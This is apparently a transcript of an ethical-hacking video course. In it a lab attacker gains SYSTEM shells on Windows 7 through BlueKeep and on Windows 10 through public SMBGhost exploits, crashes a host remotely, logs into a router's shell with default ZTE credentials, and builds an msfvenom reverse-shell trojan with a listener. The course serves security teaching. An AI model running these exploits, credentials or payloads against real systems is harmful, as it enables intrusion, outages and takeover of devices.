vulnerable. Let's use the exploit to gain access. So use exploit Windows RDP, and then let's check our possible options. We want to go with the CVE 2090 BlueKeep remote code execution. If I show info, down here it will tell you how exactly it exploits the target. And if I show our available options, so we got pretty much the same options as with the auxiliary module. We got the RDP client IP, which is this one, and we are not going to change it once again. These options are not required, so we're not going to specify them anyway. The R hosts we want to set to the IP address of Windows 7 machine. The R port is set correctly. The payload is set to Windows x64 Meterpreter reverse TCP, and this is also something that we do not want to change. Is this the only payload that will work? Well, most likely, since if I go to show targets, you will see that this exploit targets only 64-bit machines. so it will not be able to run on a 32-bit machine. So by this, it seems that 32-bit Windows 7 machines and Windows Servers 2008 are not vulnerable. Which we really don't care, because 99% of machines are 64-bit. And these targets right here is something that we must choose from. Now, this is for default and normal Windows machines. And right here we have targets for the virtual machines. And this is something that we must set. If we leave it on automatic, it should figure out on its own that we are running Windows 7 inside of a virtual box, and it will perform the exploit for the VirtualBox Windows 7 version. But if we, for example, set this one, the exploit should not work. So we must set the target to 2, in case we are running the Windows 7 inside of a VirtualBox. If we were attacking a regular Windows machine that is vulnerable, we would set 1. If we were attacking a virtual machine from the VMware station, we would set one of these 3, and we would set these 2 accordingly as well. So let's triple check our options. Everything here is set. The payload is a 64-bit payload, which is good, and the target is Windows 7 inside of a VirtualBox. Great. Let us run the exploit. It tells us that the target is vulnerable, and in just a few seconds we should get the Meterpreter shell opened on that Windows 7 machine. And after 30 to 40 seconds, here it is. We got Meterpreter session 1 opened on the target machine. If I type get user ID, it will tell me that we are system. Once again, the highest privilege account on that target machine. We can perform the commands as usual. Enter the shell, type hostname, we are test2 PC, ipconfig, gives us the IP address of the target machine, and all of these things that we're already familiar with. Great, another Windows 7 vulnerability covered. So, what is the important thing that we learned from this video? The vulnerability is called BlueKeep. It is a critical RDP or remote desktop protocol vulnerability, and in order to exploit the target, it must be an unpatched 64-bit Windows XP to Windows 7 machine, including Windows Server 2008, and it must have RDP enabled and port 3389 open. Where are these machines most likely to be found? In large companies. So once again, most likely we will not see these types of targets in home networks. Okay, great. Now that we covered Windows 7 vulnerabilities, time to go on to exploit Windows 10 machine. See you in the next video. Welcome back. In this and in the next video, I want to talk about something different. We attacked different machines, from Windows machines to Linux machines, but in these 2 videos, I want to show you that you can also target your own router, or the router from the network that you're attacking. Now, it might seem that it is not that important to test your router, but once you gain access to the router, you pretty much have the control over the entire network. And not only that, gaining access to the router is powerful. It means that you can change different network settings, that you can forward different ports, and so on and so on. The routers are also the easiest devices to hack. You might be asking, why? Well, because usually 90% of home routers and home devices have default login passwords. The vendors who provide homes with their routers never really change the default password, and default password is something that you can find on the internet. These default password attacks we're going to check out in the next tutorial, but for this one I want to show you a cool tool that you can use to test on your own router to check out whether it is vulnerable to some exploits. So just type in your search bar routersploit, and it will lead you to this GitHub link where we will have our routersploit tool. Now we already know how to download all of these GitHub tools, so let's copy the link straight away, navigate to our desktop, and we can git clone routersploit. While this is copying, let's go down to the installation commands just to see how we can install this tool properly, and here we have installation of Kali Linux and all of the commands that we must run. So we must install python 3.pip, even though I believe we already have this. Let's run the command. just to make sure, and it requires root privileges, so let's enter the root account first, and let's type the same command, apt-get install python3.pip. Everything is installed. Let's move on to the next command. We already did the git clone. Let's change the directory to routersploit. And the next command is python3, and then install the requirements. As we can see, inside of the routersploit directory, we have requirements.txt file. And whenever you have this requirements.txt, we already know that we must run this command to install all of the requirements from that file. Let's press enter. As soon as it installs all of these files that it needs, we should be ready to run the routersploit tool, which is this rsf.py. Okay, so everything has finished, and let's python3 rsf.py. And you will notice that once you run this tool, it will open something that looks similar to the MSF console. We get this command line type, and here we can execute different commands. It says right here that it has 132 exploits, 4 scanners, 171 credential attacks, 4 generic attacks, 32 payloads, and 6 encoders. Now, to check out all of the available commands, we can run help command, and it will tell us how to use a certain module, how to execute a shell command argument, and here we can also search for different tools. Now, if I type search scanners, it will give us all of the 4 scanners that it has. And in this video, we're going to use this AutoPWN scanner. This will test for all the exploits from the routersploit tool onto our target router to see whether it is vulnerable to any one of them. So let's type use scanners and then AutoPWN. Once you select it, you can type help, or pardon me, you can type show options, the same way that we do inside of the MSF console, and the only thing that we must set is target IP address. To do that, we can type set target 192.168.1.1. This is the router in my case. If you want to check out your gateway or your router, you can type the command netstat-nr, and under the gateway, you will have the IP address of your gateway. Once you check it out, type it right here, and as soon as you set your IP address, you can type run. As it says, it will start the vulnerability check, and it will go through all of these exploits and see whether your router is vulnerable to any one of them. If you have this minus sign, that means that the router is not vulnerable. If you have this star sign, that means that routersploit cannot really determine whether your router is vulnerable to this security threat. As it says right here, it could not be verified. And if you have a plus sign, which we don't have at the moment, that means it found a security vulnerability for your router. In my case, I believe I don't have any at the moment, but you might find some vulnerability for the router. Let's wait for this scan to finish. And it is done. It says could not confirm any vulnerability, and it couldn't find default credentials. And this part right here is not exactly true. We're going to check out default credentials in the next video. However, you can test these exploits with the routersploit tool. You can also check out these ones that says could not verify exploitability. This could possibly mean that they are vulnerable to these attacks, or this exploit is simply just not the type of exploit that targets your router. Okay, now that we covered the routersploit tool, we're going to see how we can gain access to the router with the default credentials vulnerability that at least 70 to 80% of home routers have. See you in the next video. Welcome back. Time to check out the default credentials vulnerability on your router. Now, this tutorial is something that you cannot follow, because this is going to be different for every type of router that someone has. I can just show you the process of how I went and discovered the default credentials, and you can try to do the same thing in order to see whether you can gain access to your router. So the first thing that I did is I typed netstat-nr to check out the IP address of my gateway, which is most likely going to be the IP address of your router. Then I went to Google Chrome and visited that IP address. If you do the same for your router, it will most likely lead you to some type of a login page where it will ask you for the username and the password. Once you type the username and the password, you will have access to the router settings and you will be able to change a few things here and there, from setting up wireless to port forwarding and similar settings like that. Now, if you haven't changed the default password for your router, you will most likely be able to find it on the internet. Which I did. I just searched the name of the router that I have right here, and I found the username to be telecom and password to be telecom. Nobody changed this username and password, therefore they're exactly the same. And we even get this warning that says a data breach on a site or app exposed your passwords. Chrome recommends changing your password for this IP address now. We're going to click on OK, and pretty much we already gained access to the router settings. We can set up the firewall, VLAN settings, we can check out different settings that we have right here. We have some security settings right here. We also get the port forwarding, which we can perform. And this is something that I tested on multiple home routers, and many of them appear to have default credentials where it allows you to log into the router and change these type of settings. But these are not the only default credentials that you can find. For example, if I go right here and I run an nmap scan with -st command on my router IP address, I will also discover that it has some ports open. For example, it has this telnet port open. We already know how we can connect to the telnet. We can type the command telnet and then the IP address of the target that we want to connect to. If I press enter, we will get another login screen. So if I type something like telecom, once again, it will tell me that the password is incorrect. So after 3 attempts, it simply just closes the connection to the router. And I figured, well, if the router default credentials weren't changed, then probably I can find the telnet credentials as well on the internet. And after a few minutes of Googling, I ran across this website where I scrolled a little bit down and I found this post that was posted by someone. It says my router name, which is this one, and we can compare it right here. It is the same name. And we get the username and password. We also get how we can enable the shell inside of that router. So let's give it a try. The username is admin and the password is this. Let's go and run telnet once again. Type username to be admin and password to be ZTONPK. And here it is. We're inside of CLI. Now, the next thing that this person does is it types enable. Then it enters the password of ZTE and then it enables shell. Let's give it a try. If I type enable, type ZTE, and then shell. Another login attempt. But luckily, this person also provided us with username and password for that. This is something that we will most likely never be able to brute force in case we didn't know, because this is a really strong username and strong password. However, it is default one, and this is something that we can find on the internet. For your router, of course, this will not be the same, but you can go through the same process of searching for the default credentials. Just figure out the name of your router, type it in Google, and try to find some default credentials. For example, we notice that I have open port SSH and Telnet. You might be able to target SSH and not Telnet, or you might be able to target some different port. It could all depend on your router. However, now I'm targeting Telnet, and let's go and type in the username and password that this person sent us. So I have it written on my left screen, and I will type FNNSD3ZXHNH168NV31. For some reason it says bad username. Let's try once again. Maybe we typed something incorrectly. So let's go admin, password, let's enable. The password is ZTE, and let's go into shell. Here we want to type FNNSD3ZXHNH168NV31, which is the login, and the password is XHNH168 NV31. And here we are. We are inside of the shell. If I type ls, we're going to be able to see the files on our router. I can type the ifconfig command to be able to see all of the interfaces that our router has. Here the first interface has the IP address of 192.168.1.1, and down here we're also going to be able to find the public IP address, which is right here. Okay, great. We have gained access to the router. We can also go and change directories to different directories if we want to. We can run different commands that you can usually run from your terminal, and that's how you can gain access to your router with default credentials. Now give it a try on your own router. Try searching the name of the router. First try logging into this page right here, which will grant you an access to some of the router settings. And even if you don't manage to do that, try scanning your router with Nmap, figure out whether it has some interesting ports open, and then target those ports with default credentials that you might manage to find online, just like I did right here. Okay, now that we covered this, we're ready to continue with our exploitation section. See you in the next video.
Hey everybody, I want to take a quick break here. Go grab a coffee, grab a tea, just take a break from all the learning that you just did. And I want to talk to you quickly about imposter syndrome. It's this idea that you're not good enough, that things are too complicated for you to ever achieve what you want to achieve. You look at other people, at other industry experts, and you say, I will never get there. But it's just a symptom of learning. This idea of you not being good enough simply means that, well, you're just not there yet. Things take time. If you want to learn a valuable skill, well, it's hard work. That's why it's valuable. Remember how you felt on the first day of going to school, first day on a job. It's the same experience. But over time, with repetition, with practice, you get comfortable, you get experience, and you slowly start to lose that imposter syndrome. Now, this idea of an imposter syndrome is great. It means you're doing something worthwhile. So don't use it as a negative. Use it as an encouragement that you're doing something good, that you're learning and you're stretching your limits. So with this break, I want to propose that we do a quick exercise. I want you to stop the lectures. Again, grab a coffee, grab a tea, and head on over to our Discord. Now, in our Discord server, if you've used it up until now, that's great. If you haven't, head on over to this server, and I want you to do something that I think it's super important to learning. And that is using what you've learned up until now to actually teach someone or help someone. So you can go all the way to, let's say, the coding and courses section and pick a topic that you want to help somebody in. So let's say you go to the Python channel. And in here, you'll have other students that are asking Python related questions. Now you can scroll through here and see if you're able to help someone. Even though you may not have the experience or the knowledge yet, this idea of practicing and explaining what you've just learned to other people, even if you're not 100% certain, actually is beneficial to your learning. Because if you're never teaching, if you're never explaining and vocalizing and showing what you've learned, you'll always be a beginner. This idea of teaching what you learn is a very important concept. So moving forward, as you go through the lectures, anytime you feel like taking a break, hop on over to Discord and help somebody. Our motto here is that we're always kind. We don't judge anybody. We're all just beginners here. We're all learning. So don't be afraid to answer things, because you got to remember, nobody's perfect except for Yoda. Yoda is pretty perfect. All right, I'll see you in the next one. Bye-bye.
Welcome back. In this small section, we're going to cover SMB Ghost Windows 10 vulnerability. Since there is no module available for the Metasploit framework regarding this vulnerability, we are going to need to exploit it manually. And by manually, I mean we will have to find a working exploit ourselves, run it ourselves, and redirect the connection to our Kali Linux machine ourselves. All of these tasks Metasploit framework did for us automatically, and since we can't really rely on tools, we're going to learn through this Windows 10 vulnerability how we can do all of that ourselves. Now, the vulnerability that we're exploiting is rather new. I believe it got disclosed in June 2020, and for this we will need to install Windows 10 Virtual Machine. Not all versions are vulnerable since it got patched, so we will have to install a vulnerable version of Windows 10 Machine. Since this as well is an SMB vulnerability, we won't need any additional software to run on our target machine for this exploit to work, which makes it even more dangerous, just like the previous two vulnerabilities, which were Eternal Blue and the Blue Keep, but they were attacking Windows 7. This one attacks Windows 10. All our target needs to have is port 445 open and some previous version of Windows 10. The exact vulnerable version that we are looking for is either Windows 10 1903 or Windows 10 1909. So you will need ISO file as usual to create this machine, and both of these versions are vulnerable to the SMB Ghost attack. Let me show you right now where we can download a previous version of Windows 10 ISO file. And by the way, we will be using this Windows machine in the next section as well to test the payloads that we will create. But more about that later on. For now on, let's focus on creating our virtual environment for this attack. So what you want to do first is you want to navigate to this rufus.ie website, and this software right here that we're going to download is used to create bootable USB drives with the ISO files. Now, you might be asking, well, why are we going to need this? We're not going to boot into our computer over USB drive, we are installing a virtual machine, and that is true. But this software also offers us to download some previous versions of Windows 10 operating system. That's why you want to go down here, click on this Rufus 3.11 and download the file. It is the size of 1.1 megabyte. Once you download it, you should be having this file right here on the desktop. Double click on that file and it will ask for the administrator password. You want to click on yes or type in the password. And right here where we want to go is this arrow next to the select button. Now here's a small advice. Sometimes this arrow right here will not appear, and it actually didn't appear to me once I downloaded the software for the first time. So what I did is I tried restarting this program several times, so just close this, open this again, close it and open it again. That might work, and what also might work is going right here to the application settings and changing this check for updates. Then click on close, restart the program, and eventually this arrow right here should appear. Once it appears, click on it and click on download. And once you select the download, click on download once again, and this will start running download script. In just a few seconds, you should have this small window pop up. Here we want to select what operating system we want to download. If I click on here, it will ask me if I want Windows 8 or Windows 10. I want to select Windows 10, click on continue. In the next step, it will ask me which exact release do I want to select, and right here we want to go with this one, which is 19H1 build 18362.356, and it says right here the date is 2019 September or 9th month. So click on this right here, then click on continue. You can select Windows 10 Home, click on continue here as well. Language we can leave on English. And the last step, which is architecture, we can leave on x64. Then you can click on download right here, or you can download using a browser. If you simply just click on download, it will open the file explorer, and here you can pick where you want to save it on your desktop. Keep in mind that the size of the file is around 5 GB, so this will take some time. Since I already have it downloaded, I will not be downloading it again. For you, just wait for the download to finish and you should have a Windows 10 ISO file ready. Make sure that you pick the exact same version that I did right here, and once all of that is finished, you can close this program. The next step is to install Windows 10 Virtual Machine. So I already got one running right here. And for you, you can do it the same way that we did with any other machine. So just type Windows 10, select right here Microsoft Windows, Windows 10 64-bit, click on next, choose 2 GB of RAM, or choose the same amount of RAM that you used for the Windows 7. Click on Next. Here we want to create a virtual hard disk. All of these steps we can next. Here I got 25 GB in my case, and you can choose whatever you want right here, and this will create your virtual machine. Now, since I already have it, I will delete it, but before I delete it, another two settings that you want to choose is, as we did with the Windows 7 machine, under the storage, under the empty, you want to remove, and you want to add the Windows 10 ISO file, which I have right here. The next setting that you want to change is from NAT to bridged adapter. Once you do all of that, you can start the process of installing Windows 10. Now, there is not any important step in Windows 10 installation, so you can do it however you want. But just a pro tip, once it gets to the part where it asks you for the account creation, where you need to specify an email address and all of that, you can skip that part by unplugging your device from the internet, and then it will allow you to create an offline Windows account, so you won't need to create an email for the Windows 10 account. All of the other steps are not important, you can do them as you like, and once you do all of that, you can start your Windows 10 machine. Another thing that we need to do to get our Windows 10 machine fully ready for this attack is to disable the firewall. So go down here, type Control Panel, and the way we disable it on Windows 10 is the same way that we disable it on Windows 7. So click on Control Panel right here, click on System and Security, click on Windows Defender Firewall, and turn it off in this button right here, which says Turn Windows Defender Firewall on or off. Mine is currently off. Once you do that, everything is ready and you should be good to go for the next video, where we are going to try to search for the exploit for this particular attack. See you in the next video. Welcome back. And now that we got our Windows 10 machine set up, we want to perform a vulnerability scan real quick to see whether it is vulnerable, and then I will show you a tool that we can use to crash the target system. So first of all, open up both of your Kali Linux and Windows 10 machines. Right here I ran the ipconfig command to check out the IP address of the Windows 10 machine, and what I'm going to do is I'm going to scan it real quick just to see what ports it has open and whether our setup was correct from the previous video. Okay, great. We got the port 445 open. That is all we need. Now, I have also performed a Nessus vulnerability scan this morning on Windows 10 machine, and for some reason it didn't manage to find this SMB Ghost vulnerability. Now, that could be some type of a bug, maybe, perhaps, since if I type locate and then the vulnerability name, which is CVE-2020-0796, and this is just the name for this particular vulnerability, and I type enter, here it will find the path to the Nessus with the module for that vulnerability. So it seems that it has a plugin for that vulnerability and it should be able to discover it. But once again, for me personally, it didn't manage to find it. You can try it out. You know right now how to use Nessus, so just open it up, open your Windows 10 machine, and run a scan in Nessus on your Windows 10 machine and see if you can come up with this vulnerability from there. But what we want to do right now is we want to copy this name and we want to go to the Firefox. Since, remember, this is something that we do not have in Metasploit framework, we must find the exploit ourselves. Once the Firefox opens up, paste the vulnerability name right here, and I will just type it real quick, so 2020-0796. And we can add GitHub. Let us check out whether there are some available tools on GitHub repository. So we got a few responses right here. And what we want to go with first is the vulnerability scanner. And what I mean by vulnerability scanner is we want a tool that will tell us whether the target machine is vulnerable to this attack without crashing or exploiting it. So I will go to this link right here, and it seems that this is the tool that we need. It says the vulnerability name, scanner.py, identifying and mitigating the CVE 2020-0796 flaw in the fly. So let's check it out. Let's copy the name of this vulnerability. Then we will go to our desktop and we will git clone that repository to our desktop directory. Once it finishes downloading, we can type ls. Here it is, right here. Let's change directory to there by typing cd, and let's see which files we have. So we have only this scanner.py file. So it is a Python file. Let us go to this page and just check real quick whether it is a Python 2 or 3 program, and by the usage that we can see right here, it seems that it is a Python 3 program. So let's test it out. If I go right here, check out the IP address of Windows 10 machine. For me it is 192.168.1.5. Let's run the program, Python 3, and then type the IP address. Well, we get a response that we wanted. It says right here, vulnerable. Great. Now we can test other tools that will crash and exploit the target. First, I want to show you a tool that you can use to just crash the target. And with this tool, we don't need anything else besides the IP address of the target machine. So you can crash any target just by knowing its IP address. For the exploit that we will cover in the next video, we're going to cheat a little bit. We need something in order for the exploit to work. And I will show you that in the next video. For now, we want to see how we can crash the target machine. So if I go all the way down, you will see this GitHub link. It is from Gian Sitting, and it has the name of our vulnerability. If I go right here, we can see we got a few files. Once again, this is a Python tool. Under here, we got the usage, so we got a demo GIF. Here we can see the command that he is running. And if we go right here and copy the tool, and once again, we can go to our desktop and git clone the tool name, the link, paste right here, wait for the download to finish, and if I type ls, we now have two directories. This one is the scanner, and this one is the one that we just downloaded. So let's go cd, cve, we got the demo GIF, the readme file, and the vulnerability itself. Of course, if we want to, we can nano the vulnerability file or the Python file, and we can scroll all the way down to see the code of this exploit, and down here we get the usage. So all we need to specify, as it says right here, is the target IP address. Let's try it out. If I go right here and type Python, I believe it's Python 3 once again, and then cve.py, and then the IP address of the target machine. Before I run it, I will lower the screen so we can see both of our targets before running this program. And right here, if I press enter, well, here it is. We successfully crashed the target machine. It got the blue screen of death, as we can see right here, and it is now restarting. And this is also a critical vulnerability. Once again, I need to mention that you should never be able to crash the target machine just by knowing its IP address. This is something that we would also 100% write down inside of our penetration testing report. Now that we managed to scan the target to see whether it is vulnerable, and we used another tool to crash the target, let's see in the next video how we can exploit the target machine and gain shell back inside of our Kali Linux machine. See you in the next video. Welcome back. Time to gain access to our Windows 10 machine using the SMB Ghost vulnerability. For now, we managed to scan it to see if it's vulnerable, and we also managed to find a tool that we can use to crash the target system. But ideally, we don't want to crash it. Instead, we want to gain shell on that target machine. Well, with this vulnerability, it is not that easy. There are some things that we need to know in order to be able to remotely exploit it. Let's see what I mean. The first thing that we must do is we must download a tool that we are going to use for the exploitation. And I already checked a few of them out, and I found the best working one to be this ZecOps CVE vulnerability. If you just type the same thing that we typed from the previous video, which is the vulnerability name and then GitHub, you should find this ZecOps link to be on the first page. Click on it, and down here we can see the files that we get, and right here we also see the usage of the tool itself. But before we get into all of this, let us first download the tool from GitHub. So let's copy the link right here, copy, go to our terminal and type git clone and then the tool link. Press enter. And here it is, it finished downloading. Let us type ls and we will see a bunch of these directories with the same name. This one, however, has this extension of RCE and then POC, which stands for Remote Code Execution Proof of Concept. Let's change the directory to that directory. And if I type ls right here, we're going to see a bunch of files. So we get this .bat file, which runs on Windows. We get this SMB Ghost assembly shellcode for the 64-bit version, and we get this Python SMB Bleeding Ghost file, which is the exploit itself. But we don't really know how exactly do we combine all of these files. So let's go back to the page and check out the usage of the program. The first step right here tells us that make sure Python and NCAT are installed. Then run this .bat file on the target computer and adjust the offsets at the top of the SMB Bleeding Ghost.py file according to the script output. What does this mean? Well, let's go to the Python file first. Let us nano it to see what offsets do they mean. And I assume they mean these offsets right here. As we can see, there are 5 of them and they have different offsets. But you might be asking, well, it tells us right here that we must run this on the target computer. And what's the point then of calling this an exploit if there is a file that we must run on the target computer first? Well, let's go to the note down here. As it says, you might be wondering why it is necessary to run the .bat file script on the target computer. And doesn't it defeat the whole point of the remote code execution being remote? Well, here is the explanation. These offsets are not random and are the same on all Windows instances of the same Windows version. One could make the attack more universal by detecting the target Windows version and adjusting the offsets automatically, or by not relying on them altogether. What does this mean? Well, these offsets right here are the same for the same Windows version. So for example, this Windows version that we got right here, if we had 1,000 machines that were running the same Windows version, well, it is enough that we run this .bat file on this one to check out the offsets, then we adjust the offsets right here inside of our exploit, and then we can attack all the 1,000 machines without having to run the .bat file on them. But a different version of this Windows machine might have a different offset, which will then make our exploit not work. So we must check the offsets first. How we're going to do that? Well, as it says right here, we're going to run the .bat file on the target system. So I already downloaded the tool right here on my Windows machine. Here it is on the desktop. And what you can do is you can just open the Windows 10 machine, open the Internet Explorer, type the vulnerability name and then GitHub, navigate to the ZachOps tool, and then if you click on it, click on this code arrow right here, and click on download zip. This will download the tool for you, and you should have it right here on the desktop right after it. Great. Once you do that, what we can do is we can navigate using our terminal to that tool, so cd desktop and then cd cve. If I type dir right here, and I run the bat file, of course you can run it using command prompt, or you can just double click on this file and double click on the calculate target offsets. As we can see, this will open another terminal, and this will give us those 5 offsets for this particular Windows 10 version. What we must do right now is we must change these offsets to match inside of our Python file right here. So let's check it out. Here we got 2D170. The first one is the same. 32210. The second one is also the same. The third one also appears to be the same. The fourth one is different. Here it ends with 370 and here it ends with 410. So let's change that first. Let's type it 370. And the last one is also different. So here it is BAFA8. And here, if we change it, BAFA8, now everything is good. So if we Control O to save this exploit, now we should have a working exploit. We can close this. We don't need it anymore. We can also close this. And if I go back to the page to check out the next step, it tells us run ncat with the following command line arguments. So the purpose of running ncat is because once we exploit the target and we run the payload, it must connect to somewhere. Now, this listening for the incoming connection, Metasploit framework did for us automatically. Right now, we must do it ourselves, and we're going to do it with the help of ncat. So to listen for the incoming connection, we can type nc and then -lvp and then the port number. In this case, let us listen on port 4444. This will listen for the incoming connections, and once we run the exploit, the target machine will try to connect back to this port number right here on our IP address. Therefore, right after it, we should have a shell pop-up right here, and we should be able to execute commands on target machine. Great. Let's check out the next step. The next step is to run the .py file while following the command line arguments. So the command that we must run is the file name, then the target IP address, then the Kali Linux IP address, and then the port that we're listening on. And this reverse shell IP is just the IP address of the machine that you're listening for the incoming connections. And you get the explanation right here as well. So let's try it out. We're listening right here already, and let us run the file right here. We're going to use Python 3, smb bleedingghost.py, then comes the target's IP address, which is in my case 192.168.1.5, as it says right here. Then comes the IP address on my Kali Linux machine, and I'm going to check it out inside of a third terminal real quick. It is .1.12. So let's type it right here, and the last step is to specify the port number that we're listening on, and in our case, that is the port 4444. If I press enter, we get an error that says no attribute WinDLL. And I knew this error will come up. The solution to this is to run the exploit from a Windows machine. So this file right here must be ran from another Windows machine, and then we can redirect the connection to this Kali Linux machine to pop a shell. Why is that? Well, this ctypes library has no attribute WinDLL, which is only to be ran in a Windows environment, I believe. So let's test it out. For this, I'm going to use my main Windows 10 machine right here to run the exploit, and I will redirect the connection, once exploited, to the Kali Linux machine that is already listening for the incoming connections. Now I know it sounds a little bit complicated, but let's give it a try. I already downloaded the exploit right here. Here is the file containing all of the other files. And if I open my command prompt, then I navigate to this directory right here containing the exploit. What I'm going to do is I'm going to run the exact same command that I ran previously on my Kali Linux machine, just this time I will be running it from my main Windows 10 machine. So the IP address of the target is first, then comes the IP address of the machine that is listening for the incoming connections. And this might sound confusing, but this is still the IP address of our Kali Linux machine. If you want, however, you can also connect back to this Windows 10 machine, but in that case you must install netcat for Windows and listen using netcat from a Windows machine. And then right here you would specify the IP address of the Windows 10 machine that is running the exploit. Since there is no need for me to do that, I will just specify the Kali Linux IP address, and the port number is 4444. Great, the command is here, and if we execute it, it will start the exploit, and sometimes this exploit will crash the target, as we can see right here. The first try of running this exploit crashed our target machine. And this is something that you must get used to once running these type of exploits. So what I'm going to do is I'm going to Control-C this, to quit this exploit. And then what I'm going to do, clear the screen using CLS command, and I will run this command once again. Just I will wait for this Windows 10 machine to boot up once again. And we're going to give it a second try. And now that we're logged in, I will run the command once again. Now there is a chance that it will crash once again, but hopefully it will not. And here it is, it crashed once again, so I'm just going to restart it again real quick and then run the exploit for the third time. Hopefully the third time it will work. Okay, here it is, and hopefully the third time will be our lucky run. Let's run the exploit. For now everything seems to be working. We haven't reached this point in the past 2 tries, so hopefully right now the target will not crash. And what we're looking for at the end of this is, after the exploit is done, we're looking to gain a shell right here inside of our Kali Linux machine. So let's wait for this to finish. It tells us right here, wrote shellcode. And if I go to my Kali Linux machine, here it is. We got the shell on our Windows 10 target machine. If I type who am I, we are the system level account, so we're the highest level account possible. If I type ipconfig, just to check whether we have the same IP address, and that indeed is the same machine. So we successfully exploited the Windows 10 target machine. Just for this, we had to use a Windows machine to run the exploit because of some libraries inside of the Python file. And if you notice right here, it tells us that if we disconnect and if we exit this exploit, the target will probably crash. So what we would want to do is we would want to execute all of the commands that we want to execute, do what we need to do on the target machine, and then after we've done and we've exited the shell, we can go right here, stop the exploit, and once this exploit has been disrupted, that will again crash the target machine, as we can see right here. Just this time we managed to run the shell, we managed to execute commands on the target machine for as long as we wanted before crashing the machine. So the goal right here is to first gain the shell and then the machine will crash, and not crash the machine at the beginning of the exploit. But that is something that we do not have control of. So sometimes you will gain the shell and sometimes you might crash the target machine. Okay, great. So we successfully exploited Windows 10 machine. We did it manually with the help of tools that we found online. We also set up our own listener that was waiting for the incoming connections. And right now that we covered all of these vulnerabilities, starting from the next video, we're going to see how we can attack targets that do not have any vulnerability. So we're going to see how we can generate our own payloads and how we can deliver them to the target machine. See you in the next video. Okay, it is time we see how we can gain access to the secured systems. In the previous few videos, we talked about and we attacked machines that had some vulnerability inside of them, whether it was the operating system vulnerability, an outdated software, or weak credentials. We managed to exploit them through those vulnerabilities and gain access to them. But now let's see what happens if our target doesn't have any known vulnerability. What now? Well, remember I told you that the process of attacking is rather the same in this case. We want to deliver the payload to the target and execute it. Just while the target had a vulnerability, we did this through an exploit, and through that vulnerability we managed to execute the payload ourselves. Now it becomes harder. We must deliver the payload to the target using some other method, and the target has to execute the payload themselves. That is the hard part. The way you deliver the payload is completely up to you, whether it is over an email or over some HTTP page, over an USB drive, it doesn't matter. What matters is that the payload ends up on their machine and they double click and run it. For now, let us focus on just creating the payload and running it to see if it works. For this, I will use Kali Linux machine to create the payload and I will execute it on my main Windows 10 machine. You can run our payloads on the Windows 10 machine that we installed in the previous section, or you can use any other Windows machine whatsoever. It doesn't even have to be a Windows 10. It is completely up to you. Just one thing that we must make sure is that Windows Defender and antivirus software are turned off. Why? Well, we're going to be creating a payload using MSF Venom tool from the Metasploit framework. And since many people use the exact same tool to create the exact same payloads as we will right now, those payloads are well known to every antivirus software and they will get detected quickly. However, for now, our goal is not to bypass antiviruses, but to just create a payload and get it to work. So turn off your Windows Defender, and I will do it right here as well. You can go to this arrow, click on the Windows Defender, and the one thing that we want to turn off is under this virus and threat protection. We want to go to the manage settings and turn off the real-time protection. It will ask you for the administrator password, and once you type it in, it will turn off the real-time protection, as it says right here. So I will close this, and now let's create our very first Trojan. As I already said, for this we will be using a tool called MSF Venom. So I will open a terminal right here. Why we are using MSF Venom? Well, it is a known tool and it is used to generate payloads really fast. In just one command, we will be able to generate a program that will gain us an access to the target system. So let us see how we can create a simple one first. If I type the command msf venom-h, right here we're going to see our available options with the MSF Venom. And up here we also get examples of usage which tells us how we can generate a simple payload right here. Let's follow the example and try it out. Now, it tells us right here that to run the MSF Venom, we need to specify the entire path right here. But instead, we can just specify MSF Venom. It will still recognize it as the tool that we need, and we can write our options right after it. So let me clear the screen so we can see the command better. And if I go and type MSF Venom, we want to use the -p option, and this -p option stands for payload. So here we specify which type of payload are we creating. In my case, since I'm going to be attacking this Windows 10 64-bit machine, I want to generate a Windows /x64 /meterpreter /reverse TCP payload. I'm using a 64-bit because my machine is a 64-bit machine, and I'm using a reverse shell connection. Another option that we must specify is the lhost, and lhost is the IP address of your Cal Linux machine. So 192.168.1.12. In my case, I will just double check it, so sudo ifconfig test1234 is my password, and here it is, the IP address is correct. Great. Another option that we must specify is the local port, and by the way, this lhost stands for localhost, not sure if I mentioned it. And the local port is the port that the target will connect to. In our case, we can set that to be any port that we want. For example, let's use 5555. After that, we can use the -f option to specify the file type that we want to create. So since we are attacking a Windows machine in this video, I'm going to be creating an exe file. So I will just type -f and then exe, and the last option that I want to specify is -o. And this -o stands for output. Here we specify the name of the file. I will just call it shell.exe. This is all we will specify for now. So once again, we are creating a 64-bit payload for the Windows target. We set the local host, which will be written inside the payload, so the target can connect to our Cal Linux machine. And we also specify local port to which the target will connect to. After that, we mentioned that the file type will be .exe, which is an executable for Windows. And at the end, we output all of this with the name of shell.exe. Let's press enter. And here it is. Our payload is right here on our Cal Linux desktop. Here we can see it, shell.exe. This program, once executed on the target machine, will grant us an access and give us the meterpreter shell on that machine. Let's move it real quick to the target machine, and this is something that you can do however you want. You can plug in the USB device by going in Cal Linux, then on the devices, then USB, and select the USB device right here. Then you will transfer it to the USB device, and from the USB device you will transfer it to your target Windows machine. Or you can also go to the devices, click on drag and drop and set to bidirectional. This simply means that you can just copy the file from the Kali Linux desktop and paste it or just drag it to the Windows 10 desktop, in my case. In case you're using another virtual machine that you're attacking, you can just copy it first to your main machine desktop and then from the main machine desktop, copy it to the desktop of your virtual machine. Just make sure that in the target virtual machine, you also set the drag and drop to bidirectional. Great, now we got our shell.exe or our payload on the target machine. Great, but we're not done yet. Remember that this shell will attempt to connect to our Kali Linux machine once executed, since it is a reverse shell, and it will connect on the port 5555. In order for connection to be established, we must be listening on that port and have it open in order for target to even be able to connect back to us. This is something Metasploit Framework manually configured for us once we performed our exploitation of a vulnerability, but right now we must do it manually. And we can do it with the help of MSF Console as well. So what I'm going to do is I'm going to start the MSF Console. And once it opens up, I want to type use exploit multi and then handler. And this is not an actual exploit. You can imagine this as something that will listen for the incoming connection from our payload. It is also called a listener. So let's set it up. If I clear the screen to see it better and type show options, there is only one thing that we need to set, and that is the payload. So the payload in this bracket must match the payload that the target will execute. So let's change set payload to Windows x64 Meterpreter and then reverse TCP. Show options once again. And we must set the lhost and lport to match from the MSF Venom command. So set lhost to be the IP address of my Kali Linux machine, which is .1.12, and set the lport to be 5555. Once we set up all of these settings, we can run it. So I will just type run. We can see it is now listening for the connections and nothing else is really happening right here. Why? Well, because the shell on the target system hasn't been ran yet. So let's run it on Windows machine. Double click. And you will see nothing is opening, but if I go back to my Kali Linux machine, here it is. Here is our Meterpreter session opened. And it is identical to the ones that we had during our vulnerability exploitation section. Just this time, we created and delivered it manually, and we also manually set up our listener. Keep in mind that this didn't exploit any vulnerability. We are just relying on the mistake from the other person that is using target machine to execute our file. 